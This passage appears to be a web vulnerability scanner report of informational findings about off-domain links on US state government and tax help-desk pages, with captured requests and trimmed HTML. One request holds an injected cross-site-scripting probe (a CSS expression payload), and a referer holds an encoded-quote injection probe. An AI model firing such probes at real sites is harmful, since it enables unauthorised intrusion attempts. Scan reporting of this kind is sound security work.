<br>- <a href="http://www.destateparks.com/">Parks and Recreation</a>
...[SNIP]...
<br>- <a href="http://www.delawareworks.com/unemployment/welcome.shtml">Unemployment Insurance</a><br>- <a href="http://www.visitdelaware.com/">Visit Delaware (Tourism)</a>
...[SNIP]...
<div align="center"><a href="http://diss.state.de.us" target="_new"><img src="/legislature.nsf/LegActions.gif?OpenImageResource" width="80" height="20" border="0" alt="">
...[SNIP]...
<div align="center"><a href="http://diss.state.de.us" target="_new"><font size="2">
...[SNIP]...

19.21. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://myflorida.custhelp.com
Path:   /cgi-bin/myflorida.cfg/php/enduser/acct_login.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/myflorida.cfg/php/enduser/acct_login.php?p_sid=ql-ywKsk&p_accessibility=0&p_redirect=&p_sp=cF9zcmNoPTEmcF9zb3J0X2J5PSZwX2dyaWRzb3J0PSZwX3Jvd19jbnQ9MCwwJnBfcHJvZHM9JnBfY2F0cz0mcF9wdj0mcF9jdj0mcF9wYWdlPTEmcF9zZWFyY2hfdGV4dD14c3M!&p_srch=1&p_next_page=std_alp.php HTTP/1.1
Host: myflorida.custhelp.com
Proxy-Connection: keep-alive
Referer: http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/std_alp.php?p_lva=&p_li=&p_accessibility=&p_redirect=&p_page=1&p_cv=&p_pv=&p_prods=&p_cats=&p_hidden_prods=&cat_lvl1=0&prod_lvl2=0&prod_lvl1=0&p_search_text=xss&x=25&y=12&p_new_search=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:09 GMT
Server: Apache
P3P: policyref="http://myflorida.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=141245 t=1304125329844119
RNT-Machine: 05
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18271

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...
<meta name="robots" content="noindex,nofollow">
<link rel="stylesheet" type="text/css" href="http://www.myflorida.com/MyFloridaStyles_p3.css">
<link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css">
...[SNIP]...
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<LINK href="http://www.myflorida.com/stylesheets/MyFloridaStyles_p3.css" type=text/css rel=stylesheet>
</HEAD>
...[SNIP]...
<td width="1%"><a href="http://www.myflorida.com/"><img src="http://www.myflorida.com/images/p3_myflorida_logo.gif" alt="Go to MyFlorida Home" width="134" height="82" border="0"></a>
...[SNIP]...
<td width="1%"><img src="http://www.myflorida.com/images/p3_myflorida_tagline.gif" alt="The Official Portal of The State of Florida" width="150" height="82"></td>
...[SNIP]...
<a href="#globallink"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Skip to Global Links" width="2" height="2" border="0"></a>
<a href="#search"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Skip to Search" width="2" height="2" border="0"></a>
<a href="#mainnav"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Skip to Main Navigation" width="2" height="2" border="0"></a>
<a href="#content1"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Skip to Content" width="2" height="2" border="0"></a>
...[SNIP]...
<TD align=right><img border="0" width=468 height=60 src="http://www.myflorida.com/images/p3_getanswers1.jpg" alt="Welcome to Florida"></TD>
...[SNIP]...
<TD bgColor=#ffffff><IMG height=2 alt=""
src="http://www.myflorida.com/images/p3_spacer.gif" width=1>
</TD>
...[SNIP]...
<TD bgColor=#6b79a5><IMG height=2 alt=""
src="http://www.myflorida.com/images/p3_spacer.gif" width=1>
</TD>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start.gif" width="27" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://www.myflorida.com/" class="tabs">Home</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://www.myflorida.com/directory" class="tabs">Find
an Agency</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://www.myflorida.com/contactus" class="tabs">Contact
Us</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://411.myflorida.com" class="tabs">411</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"> <a href="http://www.myflorida.com/taxonomy" class="tabs">Site
Map</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://www.myflorida.com/help" class="tabs">Help</a>
...[SNIP]...
<td bgcolor="#eeeeee"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="10" height="1"></td>
...[SNIP]...
<TD bgColor=#6b79a5><IMG height=1 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=1>
</TD>
...[SNIP]...
<TD bgColor=#c7d5f7><IMG height=3 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=1>
</TD>
...[SNIP]...
<TD><IMG height=1 alt="" src="http://www.myflorida.com/images/p3_spacer.gif" width=1></TD>
...[SNIP]...
<TD><IMG height=24 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=8>
</TD>
...[SNIP]...
<TD><IMG height=1 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=6>
</TD>
...[SNIP]...
<TD><IMG height=1 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=6>
</TD>
...[SNIP]...
<td width="4"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="4" height="1"></td>
...[SNIP]...
<td width="4"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="4" height="1"></td>
...[SNIP]...
<td bgcolor="#eeeeee"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="1" height="8"></td>
...[SNIP]...
<td bgcolor="#eeeeee"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="1" height="12"></td>
...[SNIP]...
<td bgcolor="#333366"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="1" height="2"></td>
...[SNIP]...
<td align="center" class="footer"><a href="http://www.myflorida.com/" class="footerlink">Home</a>
| <a href="http://www.myflorida.com/taxonomy/visitor" class="footerlink">Visitor</a> | <a href="http://www.myflorida.com/taxonomy/floridian" class="footerlink">Floridian</a>
| <a href="http://www.myflorida.com/taxonomy/business" class="footerlink">Business</a> | <a href="http://www.myflorida.com/taxonomy/government" class="footerlink">Government</a>
...[SNIP]...
<br>
<a href="http://www.myflorida.com/myflorida/copyright.html" class="footerlink">Copyright &copy;2005
State of Florida</a> | <a href="http://www.myflorida.com/myflorida/privacy.html" class="footerlink">Privacy
Statement</a> | <a href="http://www.myflorida.com/myflorida/accessibility.html" class="footerlink">Accessibility</a>
...[SNIP]...
<a href="#top"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Return to Top" width="2" height="2" border="0"></a>
...[SNIP]...

19.22. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/std_alp.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://myflorida.custhelp.com
Path:   /cgi-bin/myflorida.cfg/php/enduser/std_alp.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/myflorida.cfg/php/enduser/std_alp.php?p_lva=&p_li=&p_accessibility=&p_redirect=&p_page=1&p_cv=&p_pv=&p_prods=&p_cats=&p_hidden_prods=&cat_lvl1=0&prod_lvl2=0&prod_lvl1=0&p_search_text=xss&x=25&y=12&p_new_search=1 HTTP/1.1
Host: myflorida.custhelp.com
Proxy-Connection: keep-alive
Referer: http://www.myflorida.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:00 GMT
Server: Apache
P3P: policyref="http://myflorida.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=101820 t=1304125320834503
RNT-Machine: 02
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115402

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...
<meta http-equiv="Expires" content="-1"/>
<link rel="stylesheet" type="text/css" href="http://www.myflorida.com/MyFloridaStyles_p3.css">
<link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css">
...[SNIP]...
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<LINK href="http://www.myflorida.com/stylesheets/MyFloridaStyles_p3.css" type=text/css rel=stylesheet>
</HEAD>
...[SNIP]...
<td width="1%"><a href="http://www.myflorida.com/"><img src="http://www.myflorida.com/images/p3_myflorida_logo.gif" alt="Go to MyFlorida Home" width="134" height="82" border="0"></a>
...[SNIP]...
<td width="1%"><img src="http://www.myflorida.com/images/p3_myflorida_tagline.gif" alt="The Official Portal of The State of Florida" width="150" height="82"></td>
...[SNIP]...
<a href="#globallink"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Skip to Global Links" width="2" height="2" border="0"></a>
<a href="#search"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Skip to Search" width="2" height="2" border="0"></a>
<a href="#mainnav"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Skip to Main Navigation" width="2" height="2" border="0"></a>
<a href="#content1"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Skip to Content" width="2" height="2" border="0"></a>
...[SNIP]...
<TD align=right><img border="0" width=468 height=60 src="http://www.myflorida.com/images/p3_getanswers1.jpg" alt="Welcome to Florida"></TD>
...[SNIP]...
<TD bgColor=#ffffff><IMG height=2 alt=""
src="http://www.myflorida.com/images/p3_spacer.gif" width=1>
</TD>
...[SNIP]...
<TD bgColor=#6b79a5><IMG height=2 alt=""
src="http://www.myflorida.com/images/p3_spacer.gif" width=1>
</TD>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start.gif" width="27" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://www.myflorida.com/" class="tabs">Home</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://www.myflorida.com/directory" class="tabs">Find
an Agency</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://www.myflorida.com/contactus" class="tabs">Contact
Us</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://411.myflorida.com" class="tabs">411</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"> <a href="http://www.myflorida.com/taxonomy" class="tabs">Site
Map</a>
...[SNIP]...
<td><img src="http://www.myflorida.com/images/p3_tab_start2.gif" width="21" height="18" alt=""></td>
...[SNIP]...
<td nowrap bgcolor="#eeeeee"><a href="http://www.myflorida.com/help" class="tabs">Help</a>
...[SNIP]...
<td bgcolor="#eeeeee"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="10" height="1"></td>
...[SNIP]...
<TD bgColor=#6b79a5><IMG height=1 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=1>
</TD>
...[SNIP]...
<TD bgColor=#c7d5f7><IMG height=3 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=1>
</TD>
...[SNIP]...
<TD><IMG height=1 alt="" src="http://www.myflorida.com/images/p3_spacer.gif" width=1></TD>
...[SNIP]...
<TD><IMG height=24 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=8>
</TD>
...[SNIP]...
<TD><IMG height=1 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=6>
</TD>
...[SNIP]...
<TD><IMG height=1 alt="" src="http://www.myflorida.com/images/p3_spacer.gif"
width=6>
</TD>
...[SNIP]...
<td width="4"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="4" height="1"></td>
...[SNIP]...
<img src="/rnt/rnw/img/trnsp.gif" height="24" width="1" alt="" /> &nbsp;&nbsp;&nbsp;
<a href="http://www.rightnow.com/crm.html" target="_blank"><img height="18" width="70" border="0" alt="Powered by RightNow Technologies" src="/rnt/rnw/img/rnt_pwr_btn.gif" />
...[SNIP]...
<td width="4"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="4" height="1"></td>
...[SNIP]...
<td bgcolor="#eeeeee"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="1" height="8"></td>
...[SNIP]...
<td bgcolor="#eeeeee"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="1" height="12"></td>
...[SNIP]...
<td bgcolor="#333366"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="" width="1" height="2"></td>
...[SNIP]...
<td align="center" class="footer"><a href="http://www.myflorida.com/" class="footerlink">Home</a>
| <a href="http://www.myflorida.com/taxonomy/visitor" class="footerlink">Visitor</a> | <a href="http://www.myflorida.com/taxonomy/floridian" class="footerlink">Floridian</a>
| <a href="http://www.myflorida.com/taxonomy/business" class="footerlink">Business</a> | <a href="http://www.myflorida.com/taxonomy/government" class="footerlink">Government</a>
...[SNIP]...
<br>
<a href="http://www.myflorida.com/myflorida/copyright.html" class="footerlink">Copyright &copy;2005
State of Florida</a> | <a href="http://www.myflorida.com/myflorida/privacy.html" class="footerlink">Privacy
Statement</a> | <a href="http://www.myflorida.com/myflorida/accessibility.html" class="footerlink">Accessibility</a>
...[SNIP]...
<a href="#top"><img src="http://www.myflorida.com/images/p3_spacer.gif" alt="Return to Top" width="2" height="2" border="0"></a>
...[SNIP]...

19.23. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olt.custhelp.com
Path:   /cgi-bin/olt.cfg/php/enduser/acct_login.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_next_page=acct_login.php HTTP/1.1
Host: olt.custhelp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:11 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 21:39:11 GMT
RNT-Time: D=82489 t=1304111951723725
RNT-Machine: 01
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11770

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...
<meta name="robots" content="noindex,nofollow">
<link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" />
<link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css">
...[SNIP]...
<td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td>
            <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td>
            <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td>
            <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td>
...[SNIP]...
<nobr><a href="https://www.olt.com/main/home/default.asp">Home</a>
            &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a>
            &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a>
            &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a>
...[SNIP]...
<td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td>
...[SNIP]...
<div class="foot">
               <a href="https://www.olt.com/main/home/default.asp">Home</a> |
               <a href="https://www.olt.com/main/home/about.asp">About Us</a> |
               <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> |
               <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> |
               <a href="https://www.olt.com/main/home/states.asp">States</a> |
               <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a>
...[SNIP]...
<div class="tiny">
   <a href="https://www.olt.com/main/home/privacysecurity.asp">Privacy/Security</a> |
   <a href="https://www.olt.com/main/home/disclaimer.asp">Disclaimer/Terms Of Use</a> |
   <a href="https://www.olt.com/main/home/sitemap.asp">Site Map</a>
...[SNIP]...

19.24. http://pa.gov/portal/server.pt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pa.gov
Path:   /portal/server.pt

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /portal/server.pt? HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http
Cache-Control: max-age=0
Origin: http://pa.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plloginoccured=false; REQUESTURLBEFORESSO=; ptLastLoginAuthSource=
Content-Length: 128

in_hi_space=Login&in_hi_spaceID=82&in_hi_control=Login&in_hi_dologin=true&in_tx_username=&in_pw_userpass=&in_se_authsource=cwopa

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=uc2nxa33mmh2xs55wfhh52by; path=/
Expires: 1304080785543
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304167185543
Content-Type: text/html; charset=utf-8
Content-Length: 34484

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
</script><script type="text/javascript" src="http://www.portal.state.pa.us/imageserver/plumtree/portal/private/js/ptcommonopener.js"></script>
...[SNIP]...
<a href="#skipNavAnchor" tabindex="2"><img src="http://www.portal.state.pa.us/imageserver/plumtree/portal/public/img/sp.gif" border="0" width="1" height="1" alt="Skip Navigation"></a>
...[SNIP]...
</NOSCRIPT>PA STATE AGENCIES&nbsp;<img src="http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/header/downArrow.gif" border="0" alt="PA State Agencies - Down Arrow"/><NOSCRIPT>
...[SNIP]...
<li><a href="http://www.education.state.pa.us" alt="Education">Education</a>
...[SNIP]...
<li><a href="http://www.pema.state.pa.us/" alt="Emergency Management">Emergency Management</a>
...[SNIP]...
<li><a href="http://www.depweb.state.pa.us" alt="Environmental Protection">Environmental Protection</a>
...[SNIP]...
<li><a href="http://www.pgc.state.pa.us/" alt="Game Commission">Game Commission</a>
...[SNIP]...
<li><a href="http://www.dli.state.pa.us/" alt="Labor & Industry">Labor &amp; Industry</a>
...[SNIP]...
<li><a href="http://www.palottery.state.pa.us/" alt="Lottery">Lottery</a>
...[SNIP]...
<li><a href="http://www.dpw.state.pa.us/" alt="Public Welfare">Public Welfare</a>
...[SNIP]...
<li><a href="http://www.revenue.state.pa.us/" alt="Revenue">Revenue</a>
...[SNIP]...
<li><a href="http://www.dos.state.pa.us" alt="State">State</a>
...[SNIP]...
<li><a href="http://www.dot.state.pa.us/" alt="Transportation">Transportation</a>
...[SNIP]...
</NOSCRIPT>ONLINE SERVICES&nbsp;<img src="http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/header/downArrow.gif" border="0" alt="Online Services - Down Arrow"/><NOSCRIPT>
...[SNIP]...
<li><a href="https://www.humanservices.state.pa.us/compass/PGM/ASP/SC001.asp" alt="COMPASS: Access to Health & Human Services">COMPASS: Access to Health &amp; Human Services</a>
...[SNIP]...
<li><a href="http://www.dmv.state.pa.us/" alt="Driver & Vehicle Services">Driver &amp; Vehicle Services</a>
...[SNIP]...
<li><a href="http://www.cwds.state.pa.us" alt="Find a Job">Find a Job</a>
...[SNIP]...
<li><a href="http://fishandboat.com/license.htm" alt="Fishing Licenses">Fishing Licenses</a>
...[SNIP]...
<li><a href="http://www.psp.state.pa.us/portal/server.pt?open=512&objID=4451&&PageID=452781&mode=2" alt="Homeland Security Tip Submission">Homeland Security Tip Submission</a>
...[SNIP]...
<li><a href="http://www.theoutdoorshop.state.pa.us//FBG/game/GameLicenseSelect.asp?ShopperID=426D512E1D5A42D2B5E5EDD184A182ED" alt="Hunting Licenses">Hunting Licenses</a>
...[SNIP]...
<li><a href="https://www.doreservices.state.pa.us/individual/" alt="Personal Income Taxes">Personal Income Taxes</a>
...[SNIP]...
<li><a href="http://visitpa.travelhero.com/index.cfm/aid/1411/state/PA/index.html" alt="Places to Stay in PA">Places to Stay in PA</a>
...[SNIP]...
<li><a href="http://www.paturnpike.com/ezpass%2Dcom/" alt="Turnpike E-ZPass">Turnpike E-ZPass</a>
...[SNIP]...
<a href="#" title="Go" onclick="submitSearchptbanner(); return false;"><img src="http://www.portal.state.pa.us/imageserver/plumtree/portal/custom/enterprise/btnGo.gif" border="0" alt="Go" title="Go"></a>
...[SNIP]...
<a href="http://pa.gov/portal/server.pt/community/live/3000" style="display:block"><img border="0" id='DA_630763' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/live.gif' alt='Live in Pennsylvania'></img><img class="hideTab" border="0" id='DA_630782' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/live_roll.gif' alt='Live in Pennsylvania'></img>
...[SNIP]...
<a href="http://pa.gov/portal/server.pt/community/work/3015" style="display:block"><img border="0" id='DA_630861' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/work.gif' alt='Work in Pennsylvania'></img><img class="hideTab" border="0" id='DA_630868' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/work_roll.gif' alt='Work in Pennsylvania'></img>
...[SNIP]...
<a href="http://pa.gov/portal/server.pt/community/play/3005" style="display:block"><img border="0" id='DA_630824' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/play.gif' alt='Play in Pennsylvania'></img><img class="hideTab" border="0" id='DA_630837' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/play_roll.gif' alt='Play in Pennsylvania'></img>
...[SNIP]...
<a href="http://pa.gov/portal/server.pt/community/learn/3009" style="display:block"><img border="0" id='DA_630758' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/learn.gif' alt='Learn in Pennsylvania'></img><img class="hideTab" border="0" id='DA_630740' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/learn_roll.gif' alt='Learn in Pennsylvania'></img>
...[SNIP]...
<a href="http://pa.gov/portal/server.pt/community/media/3013" style="display:block"><img border="0" id='DA_630791' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/media.gif' alt='Media in Pennsylvania'></img><img class="hideTab" border="0" id='DA_630813' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/media_roll.gif' alt='Media in Pennsylvania'></img>
...[SNIP]...
<a href="http://pa.gov/portal/server.pt/community/government/3014" style="display:block"><img border="0" id='DA_630709' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/government.gif' alt='Government in Pennsylvania'></img><img class="hideTab" border="0" id='DA_630730' src='http://www.portal.state.pa.us/imageserver/plumtree/custom/pennsylvania/pagov/government-roll.gif' alt='Government in Pennsylvania'></img>
...[SNIP]...
<td align="center" valign="top" width="80" colspan="1" class="alertErrorTitle"><img src="http://www.portal.state.pa.us/imageserver/plumtree/portal/public/img/icon_error.gif" alt="Error" border="0" height="20" width="20"/></td>
...[SNIP]...
</span>

<img src="http://www.portal.state.pa.us/imageserver/plumtree/portal/public/img/sp.gif" border="0" height="20" width="1" alt="" title=""/></td>
...[SNIP]...
<td class="Footer" valign="middle" align="center">
                   <a href="http://www.portal.state.pa.us/portal/server.pt?open=514&objID=377333&mode=2" alt="Privacy Policy" title="Privacy Policy">Privacy Policy</a>&nbsp;|&nbsp;<a href="http://www.portal.state.pa.us/portal/server.pt?open=514&objID=377334&mode=2" alt="Security Policy" title="Security Policy">Security Policy</a>
                   |&nbsp;<a href="http://www.portal.state.pa.us/portal/server.pt?open=514&objID=368382&mode=2" alt="Keyword Search" title="Keyword Search">Keyword Search</a>
                   |&nbsp;<a href="http://www.portal.state.pa.us" alt="Commonwealth Portal" title="Commonwealth Portal">Commonwealth Portal</a>
...[SNIP]...

19.25. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ContractsAdministration/index.cfm?a=a&fuseaction=dynamic.section&secID=16 HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
Referer: http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm?a=a&fuseaction=dynamic.subsection&secID=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
